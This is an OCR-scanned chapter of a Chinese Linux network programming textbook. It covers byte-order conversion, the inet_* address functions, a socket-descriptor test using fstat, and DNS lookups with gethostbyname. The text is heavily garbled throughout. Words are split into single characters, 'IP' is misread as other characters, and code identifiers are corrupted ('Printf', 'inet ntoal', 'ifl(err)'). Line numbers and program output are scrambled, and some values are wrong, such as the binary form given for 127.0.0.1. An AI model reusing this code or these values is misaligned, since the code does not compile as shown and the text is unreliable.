43 v32_turnl.value = htonl(v32_orig.value) ;  ”/* 第 一 次 转换 */ 

44 V32_turn2.value = htonl(v32_turn1.value) ; /* 第 二 次 转换 */ 

7. 结果 打印 

最 后 将 16 位 变量 进行 两 次 字 节 序 转换 的 结果 和 32 位 变量 进行 两 次 字 节 序 转换 的 结果 
打印 出 来 。 

45 /* 打 印 结果 */ 

46 printf("16 host to network byte order change:\n"); 

47 Printf("\torig:\t") ;showvalue (v16 orig.byte, BITS16); 

48 /*16 位 数值 的 原始 值 */ 

49 Printf("\tl times:");showvalue (v16 turnl.byte, BITS16); 

50 /*16 位 数值 的 第 一 次 转换 后 的 值 */ 

三 L printf ("\t2 times:");showvalue (v16 turn2.byte, BITS16); 

52 /*16 位 数值 的 第 二 次 转换 后 的 值 */ 

53 

54 printf("32 host to network byte order change:\n"); 

号 学 Printf("\torig:\t") ;showvalue (v32 orig.byte, BITS32); 

56 /*32 位 数值 的 原始 值 */ 

57 Printf("\tl times:") ;showvalue (v32_ turnl.byte, BITS32); 

58 /*32 位 数值 的 第 一 次 转换 后 的 值 */ 

59 printf ("\t2 times:");showvalue (v32 turn2.byte, BITS32); 

60 /*32 位 数值 的 第 二 次 转换 后 的 值 */ 

61 

62 return 0; 

63 J} 


8. 编译 运行 程序 
将 上 述 的 代码 保存 到 turn_order.c 文件 中 ， 进 行 编译 后 运行 ， 结 果 为 : 


$ gcc -o turn order turn order.c /* 将 上 述 代码 编译 为 turn_order*/ 
$ ./turn order 
16 host to network byte order change: /*16 位 字 节 序 转换 #/ 
orig: cd ab /* 原 始 值 */ 
1 times:ab cd /* 第 一 次 转换 #/ 
2 times:cd ab /#+ 第 二 次 转换 */ 
32 host to network byte order change: /*32 位 字 节 序 转换 #/ 
orig: 78 56 34 12 /* 原 始 值 */ 
1 times:12 34 56 78 /* 第 一 次 转换 */ 
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2 times:78 56 34 12 /* 第 二 次 转换 */ 


16 位 变量 0xabcd 在 内 存 中 的 表示 方式 为 cd 在 前 ，ab 在 后 ; 进行 一 次 字 节 序 转换 后 变 
为 ab 在 前 ，cd 在 后 ; 进行 第 二 次 字 节 序 转换 后 变 为 cd 在 前 ，ab 在 后 。 上 面 的 情况 是 在 笔 
者 的 小 端 字 节 序 系统 上 的 结果 ， 在 大 端 字 节 序 的 主机 上 ， 即 使 调用 字 节 序 转换 函数 ， 字 节 
序 也 不 会 发 生变 化 。 同 时 可 以 发 现 ， 在 进行 第 一 次 转换 后 字 节 序 发 生 了 变化 ， 而 进行 第 二 
次 字 节 序 转换 后 与 原始 的 排列 方式 一 致 。 
将 上 述 程序 中 进行 第 二 次 转换 的 主机 向 网 络 字 节 序 转换 的 函数 ， 替 换 成 由 网 络 字 节 序 
向 主机 字 节 序 转 换 的 函数 ， 即 htons() 替 换 成 ntohs()，hton10 替 换 成 ntohl()， 结 果 如 下 : 
16 host to network byte order change: 
orig: cd ab 
1 times:ab cd 
2 times:cd ab 
32 host to network byte order change: 
orig: 78 56 34 12 


1 times:12 34 56 78 
2 times:78 56 34 12 


与 不 奉 换 的 情况 完全 一 致 ， 从 结果 看 好 像 htons() 和 ntohs()、htonl() 和 ntohl() 这 两 个 函 
数 没有 什么 区 别 。 其 实在 很 多 平台 上 htons0 和 ntohs0、htonl0 和 ntohl0 是 完全 一 致 的 ， 因 
为 这 些 函 数 的 本 质 就 是 进行 字 节 序 的 转换 。 


8.2 ”字符 串 IP 地 址 和 二 进 制 IP 地 址 的 转换 


人 们 可 以 理解 的 IP 地址 表达 方式 是 类 似 127.0.0.1 这 样 的 字符 串 ; 而 计算 机 理解 的 则 
是 像 0x01111111000000000000000000000001 (127.0.0.1) 这 样 表达 的 IP 地 址 方式 。 在 网 络 
程序 的 设计 中 ， 经 常 需要 进行 字符 串 表 达 方 式 的 IP 地 址 和 二 进 制 的 卫 地址 之 间 的 转换 ， 
本 节 将 对 此 类 函数 进行 介绍 。 


8.2.1 inet_xxx() 函 数 


Linux 操作 系统 有 一 组 函数 用 于 网 络 地 址 的 字符 串 形 式 和 二 进 制 形式 之 间 的 转换 ， 其 
形式 为 inet_ xxx()。 函 数 的 原型 如 下 : 


#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
int inet aton(const char *#cp, struct in addr *#inp); 


/* 将 点 分 四 段 式 的 IP 地 址 转 为 地 址 结构 in_addr 值 */ 
in addr t inet addr(const char *cp); /* 将 字符 串 转换 为 in_adqdr 值 */ 
in addr 七 inet_network (Const char *CP) 7 

/* 字 符 串 地 址 的 网 络 部 分 转 为 in_adqr 类 型 */ 
char *inet ntoal(struct in addr in); /* 将 in_addr 结构 地 址 转 为 字符 串 */ 
struct in addr inet makeaddr (int net, int host); 

/* 将 网 络 地 址 和 主机 地 址 合成 为 TP 地 址 */ 
in addr t inet lnaof(struct in addr in); /* 获 得 地 址 的 主机 部 分 */ 
in addr t inet netof(struct in addr in); /* 获 得 地 址 的 网 络 部 分 */ 


“人 


第 8 章 ”服务 器 和 客户 端 信息 的 获取 


1. inet_aton() 函 数 


inet_aton0) 函 数 将 在 cp 中 存储 的 点 分 十 进 制 字 符 串 类 型 的 IP 地 址 , 转换 为 二 进 制 的 他 
地 址 ， 转 换 后 的 值 保存 在 指针 inp 指向 的 结构 structure in_addr 中 。 当 转换 成 功 时 返回 值 为 
非 0， 当 传 入 的 地 址 非法 时 ， 返 回 值 为 0。 


2. inet_addr() 函 数 


inet_addr() 函 数 将 cp 中 存储 的 点 分 十 进 制 字符 串 类 型 的 耳 地 址 转换 为 二 进 制 的 卫 地 
址 ， 卫 地 址 是 以 网 络 字 节 序 表达 的 。 如 果 输 入 的 参数 非法 ,返回 值 为 INADDR_NONE ( 通 
常 为 -1)， 和 否则 返回 值 为 转换 后 的 卫 地 址 。 

这 个 函数 是 函数 inet_aton0) 的 缩减 版 ， 由 于 值 -1 (1111111111111111) 同时 可 以 理解 为 
是 合法 IP 地 址 255.255.255.255 的 转换 结果 ， 所 以 不 能 使 用 这 个 函数 转换 IP 地 址 
255.255.255.255。 


3. inet_network() 函 数 


inet_network0) 函 数 将 cp 中 存储 的 点 分 十 进 制 字符 串 类 型 的 IP 地 址 ， 转 换 为 二 进 制 的 
IP 地 址 ，IP 地 址 是 以 网 络 字 节 序 表达 的 。 当 成 功 时 返回 32 位 表示 人 PP 地址， 失败 时 返回 值 
为 1。 参数 cp 中 的 值 有 可 能 采用 以 下 形式 。 
口 a.b.c.d: 这 种 形式 指定 了 IP 地 址 的 全 部 4 个 段 ， 是 一 个 完全 的 卫 地 址 转换 ， 这 种 
情况 下 函数 inet_network() 与 函数 inet_addr() 完 全 一 致 。 
口 ab.c: 这 种 形式 指定 了 IP 地 址 的 前 3 个 段 ，a.b 解释 为 IP 地 址 的 前 16 位 ，c 解释 
为 后 面 的 16 位 。 例 如 172.16.888 会 将 888 解释 为 了 P 地 址 的 后 16 位 。 
口 ab: 这 种 形式 指定 了 IP 地 址 的 前 两 个 段 ，a 为 IP 地 址 的 前 8 位 ，b 解释 为 后 面 的 
24 位 。 例 如 ，172.888888 会 将 888888 解释 为 IP 地 址 的 后 3 段 。 
口 a 当 仅 为 一 部 分 时 ，a 的 值 直接 作为 IP 地 址 ， 不 做 字 节 序 转换 。 


4. inet_ntoal() 函 数 


inet_ntoa() 函 数 将 一 个 参数 in 所 表示 的 Internet 地 址 结构 转换 为 点 分 十 进 制 的 4 段 式 字 
符 串 IP 地 址 ， 其 形式 为 ab.c.d。 返 回 值 为 转换 后 的 字符 串 指针 ， 此 内 存 区 域 为 静态 的 ， 有 
可 能 会 被 覆盖 ， 因 此 函数 并 不 是 线程 安全 的 。 

例如 ， 将 二 进 制 的 IP 地 址 0x1000000000000001 使 用 函数 inet_ntoa() 转 换 为 字符 串 类 
型 的 结果 为 127.0.0.1。 


5. inet_makeaddr() 函 数 


一 个 主机 的 IP 地 址 分 为 网 络 地 址 和 主机 地 址 ，inet_makeaddr() 函 数 将 主机 字 节 序 的 网 
络 地 址 net 和 主机 地 址 host 合并 成 一 个 网 络 字 节 序 的 卫 地 址 。 

下 面 的 代码 将 网 络 地 址 127 和 主机 地 址 1 合并 成 一 个 卫 地址 127.0.0.1: 

unsigned long net,hst; 


net=0x0000007F; host=0x00000001; 
struct in addr ip=inet makeaddr (net,hst); 
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6._ inet_Inaof() 函 数 


inet_lnaofO) 函 数 返 回 IP 地 址 的 主机 部 分 。 例 如 ， 下 面 的 例子 返回 IP 地 址 127.0.0.1 的 
主机 部 分 : 
const char *addr= "127.0.0.1"7 


unsigned long ip= inet network(addr); 
unsigned long host id= inet lnaof (ip); 


7. inet_netof() 函 数 


inet_netofl) 函 数 返 回 IP 地 址 的 网 络 部 分 。 例 如 ， 下 面 的 例子 返回 IP 地址 127.0.0.1 的 
网 络 部 分 。 
const char *addr= "127.0.0.1"7 


unsigned long ip= inet _ network (addr) ; 
unsigned long network id= inet netof (ip); 


8. 结构 struct in_addr 


结构 struct in_addr 在 文件 <netinet/in.h> 中 定义 ， 结 构 in_addr 有 一 个 unsigned long int 
类 型 的 成 员 变 量 s_addr。 通常 所 说 的 IP 地 址 的 二 进 制 形式 就 保存 在 成 员 变 量 s_addr 中 。 结 
构 struct in_addr 的 原型 如 下 : 

struct in addr { 


unsigned long int s_ addr; /*IP 地 址 */ 
} 


全 注意 : 函数 inet_addr()、inet_network() 的 返回 值 为 -1 时 表示 错误 ， 这 占用 了 
255.255.255.255 的 值 ， 因 此 可 能 存在 缺陷 。 函 数 inet_ntoa() 的 返回 值 为 一 个 指向 
字符 串 的 指针 ， 这 块 内 存 函数 inet ntoa() 每 次 调用 都 会 重新 履 盖 ， 因 此 函数 并 不 
安全 ， 可 能 存在 某 种 隐患 。 将 字符 串 IP 地 址 转换 为 in_addr 时 ， 注 意 字符 串 中 对 
JP 地 址 的 描述 ， 上 述 函 数 假 设 字符 串 中 以 0 开始 表示 八进制 ， 以 0x 开始 表示 十 
六 进 制 ， 将 按照 各 进 制 对 字符 串 进行 解析 。 例 如 IP 地 址 192.168.000.037 最 后 一 
段 的 037 表示 的 是 八进制 的 数值 ， 即 相当 于 192.168.0.31。 


8.2.2 inet_pton() 和 inet_ntop() 函 数 


inet_pton() 函 数 和 inet_ntop() 函 数 是 一 套 安全 的 协议 无 关 的 地 址 转换 函数 。 所 谓 的 “ 安 
全 ”是 相对 于 inet_aton() 函 数 的 不 可 重 入 性 来 说 。 这 两 个 函数 都 是 可 以 重 入 的 ， 并 且 这 些 
函数 支持 多 种 地 址 类 型 ， 包 括 IPv4 和 IPv6。 

1. inet_pton() 函 数 

inet pton() 函 数 将 字符 串 类 型 的 耳 地 址 转换 为 二 进 制 类 型 ， 其 原型 如 下 。 第 1 个 参数 
af 表示 网 络 类 型 的 协议 族 , 在 IPv4 下 的 值 为 AF_INET; 第 2 个 参数 src 表示 需要 转换 的 字 
符 串 ; 第 3 个 参数 dst 指向 转换 后 的 结果 ， 在 IPv4 下 ，dst 指向 结构 struct in_addr 的 指针 。 
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#include <sys/types.h> 
#include <sys/socket.h> 
#include <arpa/inet.h> 
int inet_Pton (int af, const char *src, void *dst); 


当 函 数 inet_pton() 的 返回 值 为 -1 的 时 候 , 通常 是 由 于 af 所 指定 的 协议 族 不 支持 造成 的 ， 
此 时 errno 的 返回 值 为 EAFNOSUPPORT; 当 函 数 的 返回 值 为 0 时 ， 表 示 src 指向 的 值 不 是 
合法 的 他 地 址 ， 当 函数 的 返回 值 为 正 值 时 ， 表 示 转 换 成 功 。 


2. inet_ntop() 函 数 


inet_ntop() 函 数 将 二 进 制 的 网 络 IP 地 址 转换 为 字符 串 ， 函 数 原型 如 下 所 示 。 第 1 个 参 
数 af 表示 网 络 类 型 的 协议 族 ， 在 IPv4 下 的 值 为 AF_ INET; 第 2 个 参数 src 为 需要 转换 的 
二 进 制 IP 地 址 ， 在 IPv4 下 ，src 指向 一 个 struct in_addr 结构 类 型 的 指针 ;第 3 个 参数 dst 
指向 保存 结果 缓冲 区 的 指针 ;第 4 个 参数 cnt 的 值 是 dst 缓冲 区 的 大 小 。 

#include <sys/types.h> 

#include <sys/socket.h> 


#include <arpa/inet.h> 
const char *inet ntopl(int af, const void *src,char *dst, socklen t cnt); 


inet_ntop() 函 数 返回 一 个 指向 dst 的 指针 。 当 发 生 错误 时 ,返回 NULL。 当 af 设 定 的 协 
议 族 不 支持 时 ，errno 设置 为 EAFNOSUPPORT; 当 dst 缓冲 区 过 小 的 时 候 errno 的 值 为 
ENOSPC。 


8.2.3 使 用 8.2.1 节 地 址 转换 函数 的 例子 


8.2.1 和 8.2.2 两 节 对 地 址 转换 函数 进行 了 介绍 ， 本 节 将 通过 两 个 例子 对 上 述 函数 进行 
简单 地 说 明 。 

下 面 的 代码 是 使 用 8.2.1 节 中 的 函数 进行 测试 的 例子 ,在 这 个 例子 中 对 函数 inet_aton()、 
inet_addr()、inet_ntoa()、inet_addr()、inet_netof() 的 使 用 给 出 了 简单 的 使 用 方法 ， 并 对 函数 
的 重 入 性 能 进行 了 测试 。 测 试 结果 表明 函数 inet_ntoa()、inet_addr() 是 不 可 重 入 的 。 


1. 初始 化 设置 


先 对 程序 进行 初始 化 的 必要 设置 。 例 如 测试 的 字符 串 IP 地 址 、 用 户 保 存 结果 的 网 络 地 
址 结构 和 IP 地 址 结构 等 参数 。 


01 #include <sys/socket.h> 

02 #include <netinet/in.h> 

03 #include <arpa/inet.h> 

04 #include <stdio.h> 

05 #include <string.h> 

06 int main(int argc, char *argv[]) 


(oa 

08 struct in addr ip,local,network; 

09 char addr1[]="192.168.1.1"; /*a.b.c.d 类 型 的 网 络 地 址 字符 串 */ 
10 char addr2[]="255.255.255.255"; /* 二 进 制 值 为 全 1 的 IP 地 址 对 应 的 字符 串 */ 
11 char addr3[]="192.16.1"; /*a.b.c 类 型 的 网 络 地 址 字符 串 */ 

I2 Char *str=NULL,*str2=NULL; 

I 

14 int err = 0; 
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2. 测试 函数 inet_aton() 
测试 函数 inet_aton()， 将 字符 串 IP 地 址 192.168.1.1 转换 成 二 进 制 IP 地 址 ， 并 将 结果 


打印 出 来 。 


5 
16 
证 
18 
19 
20 
21 


/* 测 试 函数 inet_aton*/ 
err = inet aton(addrl1, &ip); 
ifl(err){ 
printf ("inet aton:string %s Value is:0x%x\n",addr1l, ip.s_addr); 
}elsei{ 
printf ("inet aton:string %s error\n",addr1); 


} 


3. 测试 函数 inet_addr() 
测试 函数 inet_addr(), 将 字符 串 IP 地 址 转换 为 二 进 制 IP 地 址 。 先 测试 192.168.1.1， 再 


测试 255.255.255.255。 
22 /*inet addr, 先 测试 192.168.1.1, 再 测试 255.255.255.255*/ 
2 ip.s_addr = inet addr (addr1); 
24 if(err != -1){ 
25 printf ("inet addr:string %s value is:0x%x\n",addr1l, ip.s_addr); 
26 }elsef{ 
pi printf ("inet addr:string %s error\n",addr1); 
28 }; 
29 ip.s_addr = inet addr (addr2); 
30 if(ip.s addr != -1){ 
El printf ("inet addr:string %s value is:0x%x\n",addr2, ip.s_addr); 
32 }else{ 
33 printf ("inet addr:string %s error\n",addr2); 
34 Fa 


4. 测试 函数 inet_ntoa() 

测试 函数 inet_ntoa()， 先 测试 IP 地址 192.168.1.1 对 应 的 字符 串 str， 然 后 测试 IP 地 址 
255.255.255.255 对 应 的 字符 串 IP 地 址 stt2。 两 个 IP 地 址 都 转换 完毕 后 ， 一 起 打印 转换 后 
的 值 ， 会 发 现 str 和 str2 的 值 是 相同 的 。 


35 
36 
37 
38 
33 
40 
41 
42 


/*inet_ntoa, 先 测试 192.168.1.1, 再 测试 255.255.255.255 

* 证 明 函 数 的 不 可 重 入 性 

ea 

ip.s_addr = 192<<241168<<1611<<8117 

str = inet _ntoa(ip) 7 

ip.s_addr = 255<<24|255<<16|255<<8|1255; 

str2 = inet ntoal(ip); 

printf ("inet ntoa:ip:0x%x stringl %s,pre is:%s \n",ip.s addr, str2, str); 


5. 测试 函数 addr() 
测试 函数 inet_addr(), 将 字符 串 IP 地 址 转换 为 二 进 制 P 地 址 ,使 用 的 字符 串 为 192.16.1。 


43 


“过 兴 二 


/* 测试 函数 inet_addr */ 


44 
45 
46 
47 
48 
49 
50 
51 
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ip.s addr = inet addr (addr3); 
ifl(err != -1){ 
printf ("inet addr:string %s value is:0x%x\n",addr3, ip.s addr); 
}else{ 
printf ("inet addr:string %s error\n",addr3); 
}; 
str = inet ntoal(ip); 
printf ("inet ntoa:string %s ip:0x%x \n",str,ip.s addr); 


6. 测试 函数 inet_Inaof() 


测试 函数 inet_lnaof()， 获 得 本 机 地 址 。 这 个 函数 只 取 四 段 式 IP 地 址 的 最 后 一 段 。 


EE 
Ee 
54 
55 
56 
时 


/* 测试 函数 inet lnaof, 获得 本 机 地 址 */ 

inet aton(addrl, &ip); 

local.s addr = htonl (ip.s addr); 

local.s addr = inet lnaof (ip); 

str = inet ntoa(local); 

printf ("inet lnaof:string %s ip:0x%x \n",str,local.s addr); 


7. 测试 函数 inet_Inaof() 


测试 函数 inet_Inaof()， 获 得 本 机 地 址 。 这 个 函数 只 取 四 段 式 IP 地 址 的 前 三 段 。 


01 
02 
03 
04 
05 
06 } 


/* 测试 函数 inet_netof, 获得 本 机 地 址 */ 
network.s addr = inet netof (ip); 
printf ("inet netof:value:0x%x \n",network.s addr); 


return 0; 


8. 编译 运行 程序 
将 上 述 代码 进行 编译 后 ， 运 行 的 结果 如 下 : 


inet aton:string 192.168.1.1 value is:0x1l01a8c0 

inet addr:string 192.168.1.1 value is:0x101a8c0 

inet addr:string 255.255.255.255 error 

netntoa pyOxEEEEEEEE stringl 255255.255.255Pre 13:25592552550255 
inet addr:string 192.16.1 value is:0x10010c0 

inet ntoa:string 192.16.0.1 ip:0x10010c0 

inet lnaof:string 1.0.0.0 ip:0x1 

inet netof:value:0xc0a801 


上 述 结 果 的 输出 信息 “inet_ntoa:ip:0xffffffff stringl 255.255.255.255,pre is:255.255.255. 
255”， 表 明 函 数 inet_ntoa 在 进行 二 进 制 卫 地 址 到 字符 串 IP 地 址 的 转换 过 程 中 是 不 可 重 入 
的 , 这 个 函数 转换 两 个 不 同 的 人 P 地 址 得 到 了 同一 个 结果 。 这 是 由 于 函数 的 实现 没有 考虑 重 


入 的 特性 ，| 


同一 个 缓冲 区 保存 了 临时 结果 。 函 数 inet_addr 同样 存在 不 可 重 入 的 问题 。 此 


之 后 ， 需 要 立即 将 结果 取出 ， 没 有 取出 结果 之 前 不 能 进行 同样 函数 的 调用 


8.2.4 使 用 函数 inet_pton() 和 函数 inet_ntop() 的 例子 


下 面 的 代码 是 使 用 函数 inet pton0 和 函数 inet_ntop() 的 例子 。 在 代码 中 使 用 函数 
inet_pton() 将 字符 串 转换 为 二 进 制 ， 使 用 函数 inet_ntop0 将 二 进 制 IP 地 址 转化 为 字符 串 。 
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01 #include <sys/types.h> 

02 #include <sys/socket.h> 

03 #include <arpa/inet.h> 

04 #include <stdio.h> 

05 #include <string.h> 

06 #define ADDRLEN 16 

07 int main(int argc, char *#argv[]) 


08 { 

09 struct in addr ip; 

10 char IPSTR[]="192.168.1.1"; /* 网 络 地 址 字符 串 */ 

得 char addr [RDDRLEN] /* 保 存 转换 后 的 字符 串 IP 地 址 , 16 个 字 节 大 小 */ 
这 const char*str=NULL; 

13 int err = 0; /* 返 回 值 */ 

14 

15 /* 测 试 函数 inet_pton 转换 192.168 .1.1 为 二 进 制 形式 */ 

16 err = inet pton(AF INET, IPSTR, &ip); /* 将 字符 串 转换 为 二 进 制 */ 
全 有 if(err > 0){ 

18 printf ("inet pton:ip,%s value is:0x%x\n",IPSTR,ip.s addr); 
19 } 

20 

2 /* 测 试 函数 inet_ntop 转换 192 .168 .1.1 为 字符 串 */ 

2 名 ip.s addr = htonl (192<<24|168<<16|12<<8|255); 


/*192.168.12.255*/ 
23 /* 将 二 进 制 网 络 字 节 序 192 .168 .12.255 转换 为 字符 串 */ 


24 Str = (const char*)inet ntop(AF _ INET, (void*) gip, (char*) gaddr[0], 
RDDRLEN) ; 

25 (gtr 

26 printf ("inet ntop:ip,O0x%x is %s\n",ip.s_addr, str); 

Eh } 

28 

29 return 0; 
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8.3” 套 接 字 描述 符 判 定 函 数 issockettype() 


套 接 字 文件 描述 符 从 形式 上 与 通用 文件 描述 符 没有 区 别 ， 判 断 一 个 文件 描述 符 是 否 是 
一 个 套 接 字 描述 符 可 以 通过 如 下 的 方法 实现 ， 先 调用 函数 fstat() 获 得 文件 描述 符 的 模式 ， 
然后 将 模式 的 S IFMT 部 分 与 标识 符 S IFSOCK 比较 ， 就 可 以 知道 一 个 文件 描述 符 是 否 为 
套 接 字 描述 符 。 

下 面 是 套 接 字 描述 符 判定 的 实例 代码 。 程 序 代码 先 构 建 一 个 用 于 测试 是 否 为 套 接 字 文 
件 描述 符 的 函数 issockettype0， 在 主 函 数 中 对 标准 输入 和 构建 后 的 套 接 字 文 件 描述 符 进 行 
是 否 套 接 字 文件 描述 符 的 判断 。 
8.3.1 进行 文件 描述 符 判定 的 函数 issockettype() 

issockettype() 函 数 先 获得 描述 符 的 状态 ， 保 存在 变量 st 中 ， 将 st 的 成 员 st_mode 与 
S_IFMT 进行 与 运算 后 获取 文件 描述 符 的 模式 。 判 断 上 述 值 是 否 与 S IFSOCK 相等 ， 就 可 
以 知道 文件 描述 符 是 否 为 套 接 字 文件 描述 符 。 

01 int issockettype (int fd) 

0225 | 


03 struct stat st; 
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04 int err = fstat(fd, &st); /* 获 得 文件 的 状态 */ 
05 

06 0) . 

07 return -1; 

08 } 

09 

10 if((st.st mode & S_IFMT) == S_IFSOCK) {  /* 比 较 是 否 套 接 字 描 述 */ 
hi return 1; 

直人 2 } elsel{ 

3 return 0; 

14 } 

E95. 


8.3.2 ”main() 函 数 


先 判断 标准 输入 是 否 为 套 接 字 文 件 描述 符 ， 将 判断 结果 打印 出 来 。 然 后 建立 一 个 套 接 
字 s， 使 用 函数 issockttype0 对 s 进行 判断 ， 并 将 判断 结果 打印 出 来 。 


01 int main(void) 


02 { 

03 int ret = issockettype (0); /* 查 询 标 准 输入 是 否 套 接 字 描 述 符 */ 
04 printf ("value %d\n",ret); 

05 

06 int s = socket (AF INET, SOCK STREAM,0); /* 建 立 套 接 字 描 述 */ 

07 ret = issockettype(s); /* 查 询 是 否 为 套 接 字 描 述 */ 
08 printf ("value %d\n",ret); /* 输 出 结果 */ 

09 

10 return 0; 

bw I 


编译 运行 上 述 的 代码 输出 如 下 : 

value 0/* 不 是 套 接 字 描述 符 */ 

value 1/* 是 套 接 字 描述 符 */ 

输出 结果 表明 标准 输入 不 是 套 接 字 描述 符 ， 而 建立 的 SOCK_STREAM 类 型 的 套 接 字 
是 套 接 字 描述 ， 通 过 上 述 方法 可 以 正确 地 判定 一 个 文件 描述 符 是 否 是 套 接 字 文件 描述 符 。 


8.4 ”IP 地 址 与 域名 之 间 的 相互 转换 


在 实际 的 使 用 中 , 经 常 有 只 知道 主机 的 域名 而 不 知道 主机 名 对 应 的 IP 地 址 的 情况 ， 而 
socket 的 API 均 为 基于 IP 地 址 ， 所 以 如 何 进行 主机 域名 和 IP 地 址 之 间 的 转换 是 十 分 必要 
的 。 本 节 将 对 DNS 的 原理 和 相关 的 域名 转换 函数 进行 介绍 。 


8.4.1 DNS 原理 


DNS (Domain Name System) 是 “域名 系统 ”的 英文 缩写 ,域名 系统 是 一 种 树 形 结构 ， 
按照 区 域 组 成 层次 性 的 结构 ， 表 示 计 算 机 名 称 和 IP 地 址 的 对 应 情况 。DNS 用 于 TCP/IP 的 
网 络 ， 用 比较 形象 化 的 友好 命名 来 代替 枯燥 的 IP 地 址 ， 方 便 用 户 记忆 。DNS 的 功能 就 是 
在 主机 的 名 称 和 IP 地 址 之 间 担 任 翻 译 工作 。 


第 2 篇 Linux 用 户 层 网 络 编程 


1. DNS 查询 过 程 

一 个 查询 DNS 地 址 过 程 的 示意 图 如 图 8.6 所 示 。 

在 实际 应 用 中 ， 经 常 有 进行 DNS 转换 的 过 程 ， 例 如 当 使 用 Web 浏览 器 时 ， 在 地 址 栏 
输入 域名 ,浏览 器 就 可 以 自动 打开 远程 主机 上 的 内 容 ， 这 里 就 有 DNS 的 主机 在 起 作用 。 本 
地 主机 将 用 户 输入 的 域名 通过 DNS 主机 翻译 成 对 应 的 IP 地址, 然后 通过 IP 地 址 访问 目标 


主机 。 
由 于 程序 仅 能 识别 IP 地 址 ， 而 IP 地 址 又 不 容易 被 记忆 ， 所 以 为 了 方便 人 类 记忆 而 又 


方便 程序 访问 ， 出 现 了 DNS 。 
客户 端 


查询 主机 域名 


顶级 域名 服务 器 


二 级 域名 服务 器 二 级 域名 服务 器 


主机 名 { 


主机 IP 地 址 0 

主机 IP 地 址 1 

主机 IP 地 址 2 三 级 域名 | [三 级 域名 三 级 域名 三 级 域名 三 级 域名 

主机 IP 地 址 3} 服务 器 服务 器 服务 器 服务 器 服务 器 
图 8.6 通过 域名 访问 远程 主 图 8.7 DNS 的 树 形 结构 


机 的 DNS 示意 图 


2. DNS 的 拓扑 结构 

DNS 按照 树 形 的 结构 构造 ， 如 图 8.7 所 示 ， 顶 级 域名 服务 器 下 分 为 多 个 二 级 域名 服务 
器 , 二 级 域名 服务 器 下 又 分 为 多 个 下 级 的 域名 服务 器 , 每 个 域名 服务 器 都 下 辖 了 一 些 主机 。 

如 果 一 个 主机 需要 查询 一 个 域名 的 IP 地 址 , 需要 向 本 地 的 域名 服务 器 查询 。 当 本 地 域 
名 服务 器 不 能 查 到 时 ， 就 向 上 一 级 的 域名 服务 器 查询 ， 当 二 级 域名 服务 器 不 能 查询 到 域名 
对 应 的 主机 信息 ， 会 向 项 级 域名 服务 器 查询 ， 如 果 顶 级 域名 服务 器 不 能 识别 该 域名 ， 则 会 
返回 错误 。 本 地 主机 查询 目标 机 的 DNS 查询 过 程 如 图 8.8 所 示 。 


8.4.2 获取 主机 信息 的 函数 


gethostbyname() 函 数 和 gethostbyaddr0 函 数 都 可 以 获得 主机 的 信息 。gethostbyname() 函 
数 通 过 主机 的 名 称 获 得 主机 的 信息 ，gethostbyaddr() 函 数 通过 IP 地 址 获得 主机 的 信息 。 


1. gethostbyname() 函 数 

gethostbyname() 函 数 的 原型 如 下 ， 它 根据 主机 名 获取 主机 的 信息 ， 例 如 www.sina. 
com.cn, 使 用 gethostbyname("www.sina.com.cn") 可 以 获得 主机 的 信息 。 这 个 函数 的 参数 name 
是 要 查询 的 主机 名 ,通常 是 DNS 的 域名 。 


.224 。 
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一 一 ”| 项 级 域名 服务 器 
学 | 
二 级 域名 服务 器 二 级 域名 服务 器 


本 地 域名 服务 器 目标 域名 服务 器 


本 地 主机 目标 主机 


图 8.8 本 地 主机 查询 目标 机 的 DNS 查询 过 程 


#include <netdb .h> 

extern :int h errno; 

struct hostent *gethostbyname (const char *name); 

gethostbyname() 函 数 的 返回 值 是 一 个 指 问 结构 struct hostent 类 型 变量 的 指针 ， 当 为 
NULL 时 ， 表 示 发 生 错误 ， 错 误 类 型 可 以 通过 errno 获得 ， 错 误 的 类 型 及 含义 如 下 所 述 。 

口 HOST NOT_ FOUND: 查询 的 主机 不 可 知 ， 即 查 不 到 相关 主机 的 信息 。 

口 NO_ADDRESS 和 NO_DATA: 请 求 的 名 称 合法 但 是 没有 合适 的 IP 地址。 

口 NO_RECOVERY: 域名 服务 器 不 响应 。 

口 TRY_AGAIN: 域名 服务 器 当前 出 现 临时 性 错误 ， 稍 后 再 试 。 

结构 struct hostent 的 原型 定义 如 下 : 


struct hostent { 


char  *h name; /* 主 机 的 正式 名 称 */ 
char  **h aliases; /* 别 名 列表 */ 
int h addrtype; /* 主 机 地 址 类 型 */ 
int h_length; /* 地 址 长 度 */ 
char  **h addr list; /* 地 址 列表 */ 
} 
#define h addr h addr list[0] /* 这 是 为 了 向 前 兼容 定义 的 宏 */ 


如 图 8.9 所 示 ， 结 构 structure hostent 由 成 员 h name、h aliases、h addrtype、h _length 
和 h_addr list 组 成 。 
口 成 员 h name 是 主机 的 官方 名 称 ， 如 新 浪 的 www.sina.com.cn。 


mse 


第 2 篇 Linux 用 户 层 网 络 编程 


结构 struct hostent 


h name 


当 为 AF_INET 时 表示 | 主机 名 0 


为 IPv4 地 址 h aliases 
主机 名 1 
h_addrtype 


主机 名 2 


主机 地 址 长 度 L 
(以 字 节 为 单位 ) 


h_addr list 
SS L-1 0 


主机 地 址 0 


h_length “上 一 一 
NULL 


主机 地 址 1 


主机 地 址 2 


NULL 


图 8.9 结构 hostent 的 示意 图 


口 成 员 h_aliases 是 主机 的 别名 ， 别 名 可 能 有 多 个 ， 所 以 用 一 个 链表 表示 ， 链 表 的 尾 
部 是 一 个 NULL 指针 。 

口 成 员 h_addrtype 是 主机 的 地 址 类 型 ，AF_INET 表示 IPv4 的 卫 地址 ，AF_INET6 
表示 IPv6 的 IP 地 址 。 

口 成 员 h_length 是 IP 地 址 的 长 度 ， 对 于 IPv4 来 说 为 4， 即 4 个 字 节 。 

口 成 员 h_addr list 是 主机 的 IP 地 址 的 链表 ， 每 个 都 为 h_length 长 ， 链 表 的 尾部 是 一 
个 NULL 指针 。 


2. gethostbyaddr() 函 数 


gethostbyaddr() 函 数 的 原型 如 下 ,， 它 通过 查询 IP 地 址 来 获得 主机 的 信息 。gethostbyaddr() 
函数 的 第 1 个 参数 addr 在 IPv4 的 情况 下 指向 一 个 struct in_addr 的 地 址 结构 ， 用 户 需 要 查询 
主机 的 他 地 址 填 入 到 这 个 参数 中 ; 第 2 个 参数 len 表示 第 一 个 参数 所 指 区 域 的 大 小 , 在 IPv4 
情况 下 为 sizeoflstruct in_addr), 即 32 位 ; 第 3 个 参数 type 指定 需要 查询 主机 卫 地 址 的 类 型 ， 
